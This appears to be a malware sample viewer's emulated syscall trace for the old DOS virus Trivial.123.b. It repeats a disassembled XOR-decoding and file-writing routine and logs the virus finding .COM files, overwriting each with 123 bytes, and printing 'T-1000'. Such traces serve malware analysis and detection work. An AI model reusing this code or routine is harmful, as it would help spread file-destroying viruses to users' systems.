Sample viewer

vx.netlux.org/Virus.DOS.Trivial.123.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:24.172847716Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.176050122Z 78 PC: 12a7a | Find first file
2018-12-17T22:54:24.183020935Z 61 PC: 12a84 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:54:24.191031983Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.198411204Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.201926778Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.217279476Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.220192277Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.224242044Z 61 PC: 12a84 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:54:24.231498465Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.239301722Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.247423689Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.257002631Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.259608937Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.265151759Z 61 PC: 12a84 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:54:24.272577587Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.279775738Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.283943306Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.292844526Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.295502128Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.298800895Z 61 PC: 12a84 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:54:24.306713157Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.314195472Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.317440627Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.32757849Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.331394358Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.334648921Z 61 PC: 12a84 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:54:24.34387452Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.360733779Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.364134737Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.374170798Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.37678583Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.380132056Z 61 PC: 12a84 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:54:24.388467373Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.396809062Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.400069917Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.409975453Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.413398102Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.416589056Z 61 PC: 12a84 | Open file (Filename = 'PAH.COM')
2018-12-17T22:54:24.423781146Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.432457653Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.435757562Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.44458329Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.448391844Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.451843076Z 61 PC: 12a84 | Open file (Filename = 'TEST.COM')
2018-12-17T22:54:24.459160762Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:54:24.464051729Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:54:24.4672894Z 62 PC: 12a9e | Close file
2018-12-17T22:54:24.475978903Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:54:24.479199492Z 79 PC: 12a7a | Find next file
2018-12-17T22:54:24.48232865Z 9 PC: 12aac | Display string (String= 'T-1000')